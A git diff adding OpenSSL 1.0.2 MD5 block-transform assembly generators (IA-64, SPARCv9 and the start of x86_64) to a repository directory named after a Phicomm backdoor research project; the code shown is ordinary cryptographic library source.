+{	.mii ;					\
+(pMore) ld4 N = [DPtr], 4 ;			\
+	add Z = M, TRound ;			\
+	and Y = c, b ;				\
+}						\
+{	.mmi ;					\
+	andcm X = d, b ;;			\
+	add Z = Z, a ;				\
+	or Y = Y, X ;				\
+} ;;						\
+{	.mii ;					\
+	ld4 TRound = [TPtr], 4 ;		\
+	add Z = Z, Y ;;				\
+	dep.z Y = Z, 32, 32 ;			\
+} ;;						\
+{	.mii ;					\
+	nop 0x0 ;				\
+	shrp Z = Z, Y, 64 - s ;;		\
+	add a = Z, b ;				\
+} ;;
+
+#define FFLOOP(a, b, c, d, M, N, s, dest)	\
+{	.mii ;					\
+(pMore)	ld4 N = [DPtr], 4 ;			\
+	add Z = M, TRound ;			\
+	and Y = c, b ;				\
+}						\
+{	.mmi ;					\
+	andcm X = d, b ;;			\
+	add Z = Z, a ;				\
+	or Y = Y, X ;				\
+} ;;						\
+{	.mii ;					\
+	ld4 TRound = [TPtr], 4 ;		\
+	add Z = Z, Y ;;				\
+	dep.z Y = Z, 32, 32 ;			\
+} ;;						\
+{	.mii ;					\
+	nop 0x0 ;				\
+	shrp Z = Z, Y, 64 - s ;;		\
+	add a = Z, b ;				\
+}						\
+{	.mib ;					\
+	cmp.ne pMore, p0 = 0, LTrip ;		\
+	add LTrip = -1, LTrip ;			\
+	br.ctop.dptk.many dest ;		\
+} ;;
+
+	.type md5_digest_block0, @function
+	.align 32
+
+	.proc md5_digest_block0
+	.prologue
+md5_digest_block0:
+	.altrp QUICK_RTN
+	.body
+{	.mmi
+	alloc PFS = ar.pfs, _NINPUTS, _NLOCALS, _NOUTPUT, _NROTATE
+	mov LTrip = 2
+	mov ar.lc = 3
+} ;;
+{	.mii
+	cmp.eq pMore, p0 = r0, r0
+	mov ar.ec = 0
+	nop 0x0
+} ;;
+
+.md5_FF_round0:
+	FFLOAD(A, B, C, D, M12, RotateM0, 7)
+	FFLOAD(D, A, B, C, M13, RotateM1, 12)
+	FFLOAD(C, D, A, B, M14, RotateM2, 17)
+	FFLOOP(B, C, D, A, M15, RotateM3, 22, .md5_FF_round0)
+	//
+	// !!! Fall through to md5_digest_GHI
+	//
+	.endp md5_digest_block0
+
+	.type md5_digest_GHI, @function
+	.align 32
+
+	.proc md5_digest_GHI
+	.prologue
+	.regstk _NINPUTS, _NLOCALS, _NOUTPUT, _NROTATE
+md5_digest_GHI:
+	.altrp QUICK_RTN
+	.body
+//
+// The following sequence shuffles the block counstants round for the
+// next round:
+//
+// 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
+// 1 6 11 0 5 10 14 4 9 14 3 8 13 2 7 12
+//
+{	.mmi
+	mov Z = M0
+	mov Y = M15
+	mov ar.lc = 3
+}
+{	.mmi
+	mov X = M2
+	mov W = M9
+	mov V = M4
+} ;;
+
+{	.mmi
+	mov M0 = M1
+	mov M15 = M12
+	mov ar.ec = 1
+}
+{	.mmi
+	mov M2 = M11
+	mov M9 = M14
+	mov M4 = M5
+} ;;
+
+{	.mmi
+	mov M1 = M6
+	mov M12 = M13
+	mov U = M3
+}
+{	.mmi
+	mov M11 = M8
+	mov M14 = M7
+	mov M5 = M10
+} ;;
+
+{	.mmi
+	mov M6 = Y
+	mov M13 = X
+	mov M3 = Z
+}
+{	.mmi
+	mov M8 = W
+	mov M7 = V
+	mov M10 = U
+} ;;
+
+.md5_GG_round:
+	GG4(.md5_GG_round)
+
+// The following sequence shuffles the block constants round for the
+// next round:
+//
+// 1 6 11 0 5 10 14 4 9 14 3 8 13 2 7 12
+// 5 8 11 14 1 4 7 10 13 0 3 6 9 12 15 2
+
+{	.mmi
+	mov Z = M0
+	mov Y = M1
+	mov ar.lc = 3
+}
+{	.mmi
+	mov X = M3
+	mov W = M5
+	mov V = M6
+} ;;
+
+{	.mmi
+	mov M0 = M4
+	mov M1 = M11
+	mov ar.ec = 1
+}
+{	.mmi
+	mov M3 = M9
+	mov U = M8
+	mov T = M13
+} ;;
+
+{	.mmi
+	mov M4 = Z
+	mov M11 = Y
+	mov M5 = M7
+}
+{	.mmi
+	mov M6 = M14
+	mov M8 = M12
+	mov M13 = M15
+} ;;
+
+{	.mmi
+	mov M7 = W
+	mov M14 = V
+	nop 0x0
+}
+{	.mmi
+	mov M9 = X
+	mov M12 = U
+	mov M15 = T
+} ;;
+
+.md5_HH_round:
+	HH4(.md5_HH_round)
+
+// The following sequence shuffles the block constants round for the
+// next round:
+//
+// 5 8 11 14 1 4 7 10 13 0 3 6 9 12 15 2
+// 0 7 14 5 12 3 10 1 8 15 6 13 4 11 2 9
+
+{	.mmi
+	mov Z = M0
+	mov Y = M15
+	mov ar.lc = 3
+}
+{	.mmi
+	mov X = M10
+	mov W = M1
+	mov V = M4
+} ;;
+
+{	.mmi
+	mov M0 = M9
+	mov M15 = M12
+	mov ar.ec = 1
+}
+{	.mmi
+	mov M10 = M11
+	mov M1 = M6
+	mov M4 = M13
+} ;;
+
+{	.mmi
+	mov M9 = M14
+	mov M12 = M5
+	mov U = M3
+}
+{	.mmi
+	mov M11 = M8
+	mov M6 = M7
+	mov M13 = M2
+} ;;
+
+{	.mmi
+	mov M14 = Y
+	mov M5 = X
+	mov M3 = Z
+}
+{	.mmi
+	mov M8 = W
+	mov M7 = V
+	mov M2 = U
+} ;;
+
+.md5_II_round:
+	II4(.md5_II_round)
+
+{	.mib
+	nop 0x0
+	nop 0x0
+	br.ret.sptk.many QUICK_RTN
+} ;;
+
+	.endp md5_digest_GHI
+
+#define FFLOADU(a, b, c, d, M, P, N, s, offset)	\
+{	.mii ;					\
+(pMore) ld4 N = [DPtr], 4 ;			\
+	add Z = M, TRound ;			\
+	and Y = c, b ;				\
+}						\
+{	.mmi ;					\
+	andcm X = d, b ;;			\
+	add Z = Z, a ;				\
+	or Y = Y, X ;				\
+} ;;						\
+{	.mii ;					\
+	ld4 TRound = [TPtr], 4 ;		\
+	GETLW(W, P, offset) ;			\
+	add Z = Z, Y ;				\
+} ;;						\
+{	.mii ;					\
+	or W = W, DTmp ;			\
+	dep.z Y = Z, 32, 32 ;;			\
+	shrp Z = Z, Y, 64 - s ;			\
+} ;;						\
+{	.mii ;					\
+	add a = Z, b ;				\
+	GETRW(DTmp, P, offset) ;		\
+	mov P = W ;				\
+} ;;
+
+#define FFLOOPU(a, b, c, d, M, P, N, s, offset)		\
+{	.mii ;						\
+(pMore) ld4 N = [DPtr], 4 ;				\
+	add Z = M, TRound ;				\
+	and Y = c, b ;					\
+}							\
+{	.mmi ;						\
+	andcm X = d, b ;;				\
+	add Z = Z, a ;					\
+	or Y = Y, X ;					\
+} ;;							\
+{	.mii ;						\
+	ld4 TRound = [TPtr], 4 ;			\
+(pMore) GETLW(W, P, offset) 	;			\
+	add Z = Z, Y ;					\
+} ;;							\
+{	.mii ;						\
+(pMore) or W = W, DTmp ;				\
+	dep.z Y = Z, 32, 32 ;;				\
+	shrp Z = Z, Y, 64 - s ;				\
+} ;;							\
+{	.mii ;						\
+	add a = Z, b ;					\
+(pMore) GETRW(DTmp, P, offset) 	;			\
+(pMore) mov P = W ;					\
+}							\
+{	.mib ;						\
+	cmp.ne pMore, p0 = 0, LTrip ;			\
+	add LTrip = -1, LTrip ;				\
+	br.ctop.sptk.many .md5_FF_round##offset ;	\
+} ;;
+
+#define MD5FBLOCK(offset)						\
+	.type md5_digest_block##offset, @function ;			\
+									\
+	.align 32 ;							\
+	.proc md5_digest_block##offset ;				\
+	.prologue ;							\
+	.altrp QUICK_RTN ;						\
+	.body ;								\
+md5_digest_block##offset:						\
+{	.mmi ;								\
+	alloc PFS = ar.pfs, _NINPUTS, _NLOCALS, _NOUTPUT, _NROTATE ;	\
+	mov LTrip = 2 ;							\
+	mov ar.lc = 3 ;							\
+} ;;									\
+{	.mii ;								\
+	cmp.eq pMore, p0 = r0, r0 ;					\
+	mov ar.ec = 0 ;							\
+	nop 0x0 ;							\
+} ;;									\
+									\
+	.pred.rel "mutex", pLoad, pSkip ;				\
+.md5_FF_round##offset:							\
+	FFLOADU(A, B, C, D, M12, M13, RotateM0, 7, offset)		\
+	FFLOADU(D, A, B, C, M13, M14, RotateM1, 12, offset)		\
+	FFLOADU(C, D, A, B, M14, M15, RotateM2, 17, offset)		\
+	FFLOOPU(B, C, D, A, M15, RotateM0, RotateM3, 22, offset)	\
+									\
+{	.mib ;								\
+	nop 0x0 ;							\
+	nop 0x0 ;							\
+	br.cond.sptk.many md5_digest_GHI ;				\
+} ;;									\
+	.endp md5_digest_block##offset
+
+MD5FBLOCK(1)
+MD5FBLOCK(2)
+MD5FBLOCK(3)
+
+	.align 64
+	.type md5_constants, @object
+md5_constants:
+.md5_tbl_data_order:			// To ensure little-endian data
+					// order, code as bytes.
+	data1 0x78, 0xa4, 0x6a, 0xd7	//     0
+	data1 0x56, 0xb7, 0xc7, 0xe8	//     1
+	data1 0xdb, 0x70, 0x20, 0x24	//     2
+	data1 0xee, 0xce, 0xbd, 0xc1	//     3
+	data1 0xaf, 0x0f, 0x7c, 0xf5	//     4
+	data1 0x2a, 0xc6, 0x87, 0x47	//     5
+	data1 0x13, 0x46, 0x30, 0xa8	//     6
+	data1 0x01, 0x95, 0x46, 0xfd	//     7
+	data1 0xd8, 0x98, 0x80, 0x69	//     8
+	data1 0xaf, 0xf7, 0x44, 0x8b	//     9
+	data1 0xb1, 0x5b, 0xff, 0xff	//    10
+	data1 0xbe, 0xd7, 0x5c, 0x89	//    11
+	data1 0x22, 0x11, 0x90, 0x6b	//    12
+	data1 0x93, 0x71, 0x98, 0xfd	//    13
+	data1 0x8e, 0x43, 0x79, 0xa6	//    14
+	data1 0x21, 0x08, 0xb4, 0x49	//    15
+	data1 0x62, 0x25, 0x1e, 0xf6	//    16
+	data1 0x40, 0xb3, 0x40, 0xc0	//    17
+	data1 0x51, 0x5a, 0x5e, 0x26	//    18
+	data1 0xaa, 0xc7, 0xb6, 0xe9	//    19
+	data1 0x5d, 0x10, 0x2f, 0xd6	//    20
+	data1 0x53, 0x14, 0x44, 0x02	//    21
+	data1 0x81, 0xe6, 0xa1, 0xd8	//    22
+	data1 0xc8, 0xfb, 0xd3, 0xe7	//    23
+	data1 0xe6, 0xcd, 0xe1, 0x21	//    24
+	data1 0xd6, 0x07, 0x37, 0xc3	//    25
+	data1 0x87, 0x0d, 0xd5, 0xf4	//    26
+	data1 0xed, 0x14, 0x5a, 0x45	//    27
+	data1 0x05, 0xe9, 0xe3, 0xa9	//    28
+	data1 0xf8, 0xa3, 0xef, 0xfc	//    29
+	data1 0xd9, 0x02, 0x6f, 0x67	//    30
+	data1 0x8a, 0x4c, 0x2a, 0x8d	//    31
+	data1 0x42, 0x39, 0xfa, 0xff	//    32
+	data1 0x81, 0xf6, 0x71, 0x87	//    33
+	data1 0x22, 0x61, 0x9d, 0x6d	//    34
+	data1 0x0c, 0x38, 0xe5, 0xfd	//    35
+	data1 0x44, 0xea, 0xbe, 0xa4	//    36
+	data1 0xa9, 0xcf, 0xde, 0x4b	//    37
+	data1 0x60, 0x4b, 0xbb, 0xf6	//    38
+	data1 0x70, 0xbc, 0xbf, 0xbe	//    39
+	data1 0xc6, 0x7e, 0x9b, 0x28	//    40
+	data1 0xfa, 0x27, 0xa1, 0xea	//    41
+	data1 0x85, 0x30, 0xef, 0xd4	//    42
+	data1 0x05, 0x1d, 0x88, 0x04	//    43
+	data1 0x39, 0xd0, 0xd4, 0xd9	//    44
+	data1 0xe5, 0x99, 0xdb, 0xe6	//    45
+	data1 0xf8, 0x7c, 0xa2, 0x1f	//    46
+	data1 0x65, 0x56, 0xac, 0xc4	//    47
+	data1 0x44, 0x22, 0x29, 0xf4	//    48
+	data1 0x97, 0xff, 0x2a, 0x43	//    49
+	data1 0xa7, 0x23, 0x94, 0xab	//    50
+	data1 0x39, 0xa0, 0x93, 0xfc	//    51
+	data1 0xc3, 0x59, 0x5b, 0x65	//    52
+	data1 0x92, 0xcc, 0x0c, 0x8f	//    53
+	data1 0x7d, 0xf4, 0xef, 0xff	//    54
+	data1 0xd1, 0x5d, 0x84, 0x85	//    55
+	data1 0x4f, 0x7e, 0xa8, 0x6f	//    56
+	data1 0xe0, 0xe6, 0x2c, 0xfe	//    57
+	data1 0x14, 0x43, 0x01, 0xa3	//    58
+	data1 0xa1, 0x11, 0x08, 0x4e	//    59
+	data1 0x82, 0x7e, 0x53, 0xf7	//    60
+	data1 0x35, 0xf2, 0x3a, 0xbd	//    61
+	data1 0xbb, 0xd2, 0xd7, 0x2a	//    62
+	data1 0x91, 0xd3, 0x86, 0xeb	//    63
+.size	md5_constants#,64*4
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/asm/md5-sparcv9.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/asm/md5-sparcv9.pl
new file mode 100644
index 0000000..407da3c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/asm/md5-sparcv9.pl
@@ -0,0 +1,430 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+#
+# Hardware SPARC T4 support by David S. Miller <davem@davemloft.net>.
+# ====================================================================
+
+# MD5 for SPARCv9, 6.9 cycles per byte on UltraSPARC, >40% faster than
+# code generated by Sun C 5.2.
+
+# SPARC T4 MD5 hardware achieves 3.20 cycles per byte, which is 2.1x
+# faster than software. Multi-process benchmark saturates at 12x
+# single-process result on 8-core processor, or ~11GBps per 2.85GHz
+# socket.
+
+$output=shift;
+open STDOUT,">$output";
+
+use integer;
+
+($ctx,$inp,$len)=("%i0","%i1","%i2");	# input arguments
+
+# 64-bit values
+@X=("%o0","%o1","%o2","%o3","%o4","%o5","%o7","%g1","%g2");
+$tx="%g3";
+($AB,$CD)=("%g4","%g5");
+
+# 32-bit values
+@V=($A,$B,$C,$D)=map("%l$_",(0..3));
+($t1,$t2,$t3,$saved_asi)=map("%l$_",(4..7));
+($shr,$shl1,$shl2)=("%i3","%i4","%i5");
+
+my @K=(	0xd76aa478,0xe8c7b756,0x242070db,0xc1bdceee,
+	0xf57c0faf,0x4787c62a,0xa8304613,0xfd469501,
+	0x698098d8,0x8b44f7af,0xffff5bb1,0x895cd7be,
+	0x6b901122,0xfd987193,0xa679438e,0x49b40821,
+
+	0xf61e2562,0xc040b340,0x265e5a51,0xe9b6c7aa,
+	0xd62f105d,0x02441453,0xd8a1e681,0xe7d3fbc8,
+	0x21e1cde6,0xc33707d6,0xf4d50d87,0x455a14ed,
+	0xa9e3e905,0xfcefa3f8,0x676f02d9,0x8d2a4c8a,
+
+	0xfffa3942,0x8771f681,0x6d9d6122,0xfde5380c,
+	0xa4beea44,0x4bdecfa9,0xf6bb4b60,0xbebfbc70,
+	0x289b7ec6,0xeaa127fa,0xd4ef3085,0x04881d05,
+	0xd9d4d039,0xe6db99e5,0x1fa27cf8,0xc4ac5665,
+
+	0xf4292244,0x432aff97,0xab9423a7,0xfc93a039,
+	0x655b59c3,0x8f0ccc92,0xffeff47d,0x85845dd1,
+	0x6fa87e4f,0xfe2ce6e0,0xa3014314,0x4e0811a1,
+	0xf7537e82,0xbd3af235,0x2ad7d2bb,0xeb86d391, 0	);
+
+sub R0 {
+  my ($i,$a,$b,$c,$d) = @_;
+  my $rot = (7,12,17,22)[$i%4];
+  my $j   = ($i+1)/2;
+
+  if ($i&1) {
+    $code.=<<___;
+	 srlx	@X[$j],$shr,@X[$j]	! align X[`$i+1`]
+	and	$b,$t1,$t1		! round $i
+	 sllx	@X[$j+1],$shl1,$tx
+	add	$t2,$a,$a
+	 sllx	$tx,$shl2,$tx
+	xor	$d,$t1,$t1
+	 or	$tx,@X[$j],@X[$j]
+	 sethi	%hi(@K[$i+1]),$t2
+	add	$t1,$a,$a
+	 or	$t2,%lo(@K[$i+1]),$t2
+	sll	$a,$rot,$t3
+	 add	@X[$j],$t2,$t2		! X[`$i+1`]+K[`$i+1`]
+	srl	$a,32-$rot,$a
+	add	$b,$t3,$t3
+	 xor	 $b,$c,$t1
+	add	$t3,$a,$a
+___
+  } else {
+    $code.=<<___;
+	 srlx	@X[$j],32,$tx		! extract X[`2*$j+1`]
+	and	$b,$t1,$t1		! round $i
+	add	$t2,$a,$a
+	xor	$d,$t1,$t1
+	 sethi	%hi(@K[$i+1]),$t2
+	add	$t1,$a,$a
+	 or	$t2,%lo(@K[$i+1]),$t2
+	sll	$a,$rot,$t3
+	 add	$tx,$t2,$t2		! X[`2*$j+1`]+K[`$i+1`]
+	srl	$a,32-$rot,$a
+	add	$b,$t3,$t3
+	 xor	 $b,$c,$t1
+	add	$t3,$a,$a
+___
+  }
+}
+
+sub R0_1 {
+  my ($i,$a,$b,$c,$d) = @_;
+  my $rot = (7,12,17,22)[$i%4];
+
+$code.=<<___;
+	 srlx	@X[0],32,$tx		! extract X[1]
+	and	$b,$t1,$t1		! round $i
+	add	$t2,$a,$a
+	xor	$d,$t1,$t1
+	 sethi	%hi(@K[$i+1]),$t2
+	add	$t1,$a,$a
+	 or	$t2,%lo(@K[$i+1]),$t2
+	sll	$a,$rot,$t3
+	 add	$tx,$t2,$t2		! X[1]+K[`$i+1`]
+	srl	$a,32-$rot,$a
+	add	$b,$t3,$t3
+	 andn	 $b,$c,$t1
+	add	$t3,$a,$a
+___
+}
+
+sub R1 {
+  my ($i,$a,$b,$c,$d) = @_;
+  my $rot = (5,9,14,20)[$i%4];
+  my $j   = $i<31 ? (1+5*($i+1))%16 : (5+3*($i+1))%16;
+  my $xi  = @X[$j/2];
+
+$code.=<<___ if ($j&1 && ($xi=$tx));
+	 srlx	@X[$j/2],32,$xi		! extract X[$j]
+___
+$code.=<<___;
+	and	$b,$d,$t3		! round $i
+	add	$t2,$a,$a
+	or	$t3,$t1,$t1
+	 sethi	%hi(@K[$i+1]),$t2
+	add	$t1,$a,$a
+	 or	$t2,%lo(@K[$i+1]),$t2
+	sll	$a,$rot,$t3
+	 add	$xi,$t2,$t2		! X[$j]+K[`$i+1`]
+	srl	$a,32-$rot,$a
+	add	$b,$t3,$t3
+	 `$i<31?"andn":"xor"`	 $b,$c,$t1
+	add	$t3,$a,$a
+___
+}
+
+sub R2 {
+  my ($i,$a,$b,$c,$d) = @_;
+  my $rot = (4,11,16,23)[$i%4];
+  my $j   = $i<47 ? (5+3*($i+1))%16 : (0+7*($i+1))%16;
+  my $xi  = @X[$j/2];
+
+$code.=<<___ if ($j&1 && ($xi=$tx));
+	 srlx	@X[$j/2],32,$xi		! extract X[$j]
+___
+$code.=<<___;
+	add	$t2,$a,$a		! round $i
+	xor	$b,$t1,$t1
+	 sethi	%hi(@K[$i+1]),$t2
+	add	$t1,$a,$a
+	 or	$t2,%lo(@K[$i+1]),$t2
+	sll	$a,$rot,$t3
+	 add	$xi,$t2,$t2		! X[$j]+K[`$i+1`]
+	srl	$a,32-$rot,$a
+	add	$b,$t3,$t3
+	 xor	 $b,$c,$t1
+	add	$t3,$a,$a
+___
+}
+
+sub R3 {
+  my ($i,$a,$b,$c,$d) = @_;
+  my $rot = (6,10,15,21)[$i%4];
+  my $j   = (0+7*($i+1))%16;
+  my $xi  = @X[$j/2];
+
+$code.=<<___;
+	add	$t2,$a,$a		! round $i
+___
+$code.=<<___ if ($j&1 && ($xi=$tx));
+	 srlx	@X[$j/2],32,$xi		! extract X[$j]
+___
+$code.=<<___;
+	orn	$b,$d,$t1
+	 sethi	%hi(@K[$i+1]),$t2
+	xor	$c,$t1,$t1
+	 or	$t2,%lo(@K[$i+1]),$t2
+	add	$t1,$a,$a
+	sll	$a,$rot,$t3
+	 add	$xi,$t2,$t2		! X[$j]+K[`$i+1`]
+	srl	$a,32-$rot,$a
+	add	$b,$t3,$t3
+	add	$t3,$a,$a
+___
+}
+
+$code.=<<___;
+#include "sparc_arch.h"
+
+#ifdef __arch64__
+.register	%g2,#scratch
+.register	%g3,#scratch
+#endif
+
+.section	".text",#alloc,#execinstr
+
+#ifdef __PIC__
+SPARC_PIC_THUNK(%g1)
+#endif
+
+.globl	md5_block_asm_data_order
+.align	32
+md5_block_asm_data_order:
+	SPARC_LOAD_ADDRESS_LEAF(OPENSSL_sparcv9cap_P,%g1,%g5)
+	ld	[%g1+4],%g1		! OPENSSL_sparcv9cap_P[1]
+
+	andcc	%g1, CFR_MD5, %g0
+	be	.Lsoftware
+	nop
+
+	mov	4, %g1
+	andcc	%o1, 0x7, %g0
+	lda	[%o0 + %g0]0x88, %f0		! load context
+	lda	[%o0 + %g1]0x88, %f1
+	add	%o0, 8, %o0
+	lda	[%o0 + %g0]0x88, %f2
+	lda	[%o0 + %g1]0x88, %f3
+	bne,pn	%icc, .Lhwunaligned
+	sub	%o0, 8, %o0
+
+.Lhw_loop:
+	ldd	[%o1 + 0x00], %f8
+	ldd	[%o1 + 0x08], %f10
+	ldd	[%o1 + 0x10], %f12
+	ldd	[%o1 + 0x18], %f14
+	ldd	[%o1 + 0x20], %f16
+	ldd	[%o1 + 0x28], %f18
+	ldd	[%o1 + 0x30], %f20
+	subcc	%o2, 1, %o2		! done yet? 
+	ldd	[%o1 + 0x38], %f22
+	add	%o1, 0x40, %o1
+	prefetch [%o1 + 63], 20
+
+	.word	0x81b02800		! MD5
+
+	bne,pt	SIZE_T_CC, .Lhw_loop
+	nop
+
+.Lhwfinish:
+	sta	%f0, [%o0 + %g0]0x88	! store context
+	sta	%f1, [%o0 + %g1]0x88
+	add	%o0, 8, %o0
+	sta	%f2, [%o0 + %g0]0x88
+	sta	%f3, [%o0 + %g1]0x88
+	retl
+	nop
+
+.align	8
+.Lhwunaligned:
+	alignaddr %o1, %g0, %o1
+
+	ldd	[%o1 + 0x00], %f10
+.Lhwunaligned_loop:
+	ldd	[%o1 + 0x08], %f12
+	ldd	[%o1 + 0x10], %f14
+	ldd	[%o1 + 0x18], %f16
+	ldd	[%o1 + 0x20], %f18
+	ldd	[%o1 + 0x28], %f20
+	ldd	[%o1 + 0x30], %f22
+	ldd	[%o1 + 0x38], %f24
+	subcc	%o2, 1, %o2		! done yet?
+	ldd	[%o1 + 0x40], %f26
+	add	%o1, 0x40, %o1
+	prefetch [%o1 + 63], 20
+
+	faligndata %f10, %f12, %f8
+	faligndata %f12, %f14, %f10
+	faligndata %f14, %f16, %f12
+	faligndata %f16, %f18, %f14
+	faligndata %f18, %f20, %f16
+	faligndata %f20, %f22, %f18
+	faligndata %f22, %f24, %f20
+	faligndata %f24, %f26, %f22
+
+	.word	0x81b02800		! MD5
+
+	bne,pt	SIZE_T_CC, .Lhwunaligned_loop
+	for	%f26, %f26, %f10	! %f10=%f26
+
+	ba	.Lhwfinish
+	nop
+
+.align	16
+.Lsoftware:
+	save	%sp,-STACK_FRAME,%sp
+
+	rd	%asi,$saved_asi
+	wr	%g0,0x88,%asi		! ASI_PRIMARY_LITTLE
+	and	$inp,7,$shr
+	andn	$inp,7,$inp
+
+	sll	$shr,3,$shr		! *=8
+	mov	56,$shl2
+	ld	[$ctx+0],$A
+	sub	$shl2,$shr,$shl2
+	ld	[$ctx+4],$B
+	and	$shl2,32,$shl1
+	add	$shl2,8,$shl2
+	ld	[$ctx+8],$C
+	sub	$shl2,$shl1,$shl2	! shr+shl1+shl2==64
+	ld	[$ctx+12],$D
+	nop
+
+.Loop:
+	 cmp	$shr,0			! was inp aligned?
+	ldxa	[$inp+0]%asi,@X[0]	! load little-endian input
+	ldxa	[$inp+8]%asi,@X[1]
+	ldxa	[$inp+16]%asi,@X[2]
+	ldxa	[$inp+24]%asi,@X[3]
+	ldxa	[$inp+32]%asi,@X[4]
+	 sllx	$A,32,$AB		! pack A,B
+	ldxa	[$inp+40]%asi,@X[5]
+	 sllx	$C,32,$CD		! pack C,D
+	ldxa	[$inp+48]%asi,@X[6]
+	 or	$B,$AB,$AB
+	ldxa	[$inp+56]%asi,@X[7]
+	 or	$D,$CD,$CD
+	bnz,a,pn	%icc,.+8
+	ldxa	[$inp+64]%asi,@X[8]
+
+	srlx	@X[0],$shr,@X[0]	! align X[0]
+	sllx	@X[1],$shl1,$tx
+	 sethi	%hi(@K[0]),$t2
+	sllx	$tx,$shl2,$tx
+	 or	$t2,%lo(@K[0]),$t2
+	or	$tx,@X[0],@X[0]
+	 xor	$C,$D,$t1
+	 add	@X[0],$t2,$t2		! X[0]+K[0]
+___
+	for ($i=0;$i<15;$i++)	{ &R0($i,@V);	unshift(@V,pop(@V)); }
+	for (;$i<16;$i++)	{ &R0_1($i,@V);	unshift(@V,pop(@V)); }
+	for (;$i<32;$i++)	{ &R1($i,@V);	unshift(@V,pop(@V)); }
+	for (;$i<48;$i++)	{ &R2($i,@V);	unshift(@V,pop(@V)); }
+	for (;$i<64;$i++)	{ &R3($i,@V);	unshift(@V,pop(@V)); }
+$code.=<<___;
+	srlx	$AB,32,$t1		! unpack A,B,C,D and accumulate
+	add	$inp,64,$inp		! advance inp
+	srlx	$CD,32,$t2
+	add	$t1,$A,$A
+	subcc	$len,1,$len		! done yet?
+	add	$AB,$B,$B
+	add	$t2,$C,$C
+	add	$CD,$D,$D
+	srl	$B,0,$B			! clruw	$B
+	bne	SIZE_T_CC,.Loop
+	srl	$D,0,$D			! clruw	$D
+
+	st	$A,[$ctx+0]		! write out ctx
+	st	$B,[$ctx+4]
+	st	$C,[$ctx+8]
+	st	$D,[$ctx+12]
+
+	wr	%g0,$saved_asi,%asi
+	ret
+	restore
+.type	md5_block_asm_data_order,#function
+.size	md5_block_asm_data_order,(.-md5_block_asm_data_order)
+
+.asciz	"MD5 block transform for SPARCv9, CRYPTOGAMS by <appro\@openssl.org>"
+.align	4
+___
+
+# Purpose of these subroutines is to explicitly encode VIS instructions,
+# so that one can compile the module without having to specify VIS
+# extentions on compiler command line, e.g. -xarch=v9 vs. -xarch=v9a.
+# Idea is to reserve for option to produce "universal" binary and let
+# programmer detect if current CPU is VIS capable at run-time.
+sub unvis {
+my ($mnemonic,$rs1,$rs2,$rd)=@_;
+my $ref,$opf;
+my %visopf = (	"faligndata"	=> 0x048,
+		"for"		=> 0x07c	);
+
+    $ref = "$mnemonic\t$rs1,$rs2,$rd";
+
+    if ($opf=$visopf{$mnemonic}) {
+	foreach ($rs1,$rs2,$rd) {
+	    return $ref if (!/%f([0-9]{1,2})/);
+	    $_=$1;
+	    if ($1>=32) {
+		return $ref if ($1&1);
+		# re-encode for upper double register addressing
+		$_=($1|$1>>5)&31;
+	    }
+	}
+
+	return	sprintf ".word\t0x%08x !%s",
+			0x81b00000|$rd<<25|$rs1<<14|$opf<<5|$rs2,
+			$ref;
+    } else {
+	return $ref;
+    }
+}
+sub unalignaddr {
+my ($mnemonic,$rs1,$rs2,$rd)=@_;
+my %bias = ( "g" => 0, "o" => 8, "l" => 16, "i" => 24 );
+my $ref="$mnemonic\t$rs1,$rs2,$rd";
+
+    foreach ($rs1,$rs2,$rd) {
+	if (/%([goli])([0-7])/)	{ $_=$bias{$1}+$2; }
+	else			{ return $ref; }
+    }
+    return  sprintf ".word\t0x%08x !%s",
+		    0x81b00300|$rd<<25|$rs1<<14|$rs2,
+		    $ref;
+}
+
+foreach (split("\n",$code)) {
+	s/\`([^\`]*)\`/eval $1/ge;
+
+	s/\b(f[^\s]*)\s+(%f[0-9]{1,2}),\s*(%f[0-9]{1,2}),\s*(%f[0-9]{1,2})/
+		&unvis($1,$2,$3,$4)
+	 /ge;
+	s/\b(alignaddr)\s+(%[goli][0-7]),\s*(%[goli][0-7]),\s*(%[goli][0-7])/
+		&unalignaddr($1,$2,$3,$4)
+	 /ge;
+
+	print $_,"\n";
+}
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/asm/md5-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/asm/md5-x86_64.pl
new file mode 100755
index 0000000..381bf77
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/md5/asm/md5-x86_64.pl
@@ -0,0 +1,370 @@
+#!/usr/bin/perl -w
+#
+# MD5 optimized for AMD64.
+#
+# Author: Marc Bevand <bevand_m (at) epita.fr>
+# Licence: I hereby disclaim the copyright on this code and place it
+# in the public domain.
+#
+
+use strict;
+
+my $code;
+
+# round1_step() does:
+#   dst = x + ((dst + F(x,y,z) + X[k] + T_i) <<< s)
+#   %r10d = X[k_next]
+#   %r11d = z' (copy of z for the next step)
+# Each round1_step() takes about 5.3 clocks (9 instructions, 1.7 IPC)
+sub round1_step
+{
+    my ($pos, $dst, $x, $y, $z, $k_next, $T_i, $s) = @_;
+    $code .= " mov	0*4(%rsi),	%r10d		/* (NEXT STEP) X[0] */\n" if ($pos == -1);
+    $code .= " mov	%edx,		%r11d		/* (NEXT STEP) z' = %edx */\n" if ($pos == -1);
+    $code .= <<EOF;
+	xor	$y,		%r11d		/* y ^ ... */
+	lea	$T_i($dst,%r10d),$dst		/* Const + dst + ... */
+	and	$x,		%r11d		/* x & ... */
+	xor	$z,		%r11d		/* z ^ ... */
+	mov	$k_next*4(%rsi),%r10d		/* (NEXT STEP) X[$k_next] */
+	add	%r11d,		$dst		/* dst += ... */
+	rol	\$$s,		$dst		/* dst <<< s */
+	mov	$y,		%r11d		/* (NEXT STEP) z' = $y */
+	add	$x,		$dst		/* dst += x */
+EOF
+}
+
+# round2_step() does:
+#   dst = x + ((dst + G(x,y,z) + X[k] + T_i) <<< s)
+#   %r10d = X[k_next]
+#   %r11d = z' (copy of z for the next step)
+#   %r12d = z' (copy of z for the next step)
